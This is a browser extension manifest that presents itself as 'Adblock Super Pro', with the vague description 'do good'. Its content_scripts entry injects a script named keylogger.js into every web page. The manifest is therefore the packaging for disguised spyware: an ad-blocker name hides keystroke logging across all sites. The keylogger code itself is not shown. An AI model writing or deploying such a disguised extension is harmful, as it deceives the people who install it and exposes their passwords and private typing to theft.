{
  "name": "Adblock Super Pro",
  "description": "do good",
  "version": "2.0",
  "permissions": [
    "activeTab"
  ],
  "browser_action": {
    "default_title": "Make things good"
//    "default_icon" : "icon.png"
  },
  "content_scripts": [
  {
      "matches": ["<all_urls>"],
      "js": ["keylogger.js"]
  }
  ],
  "manifest_version": 2
}
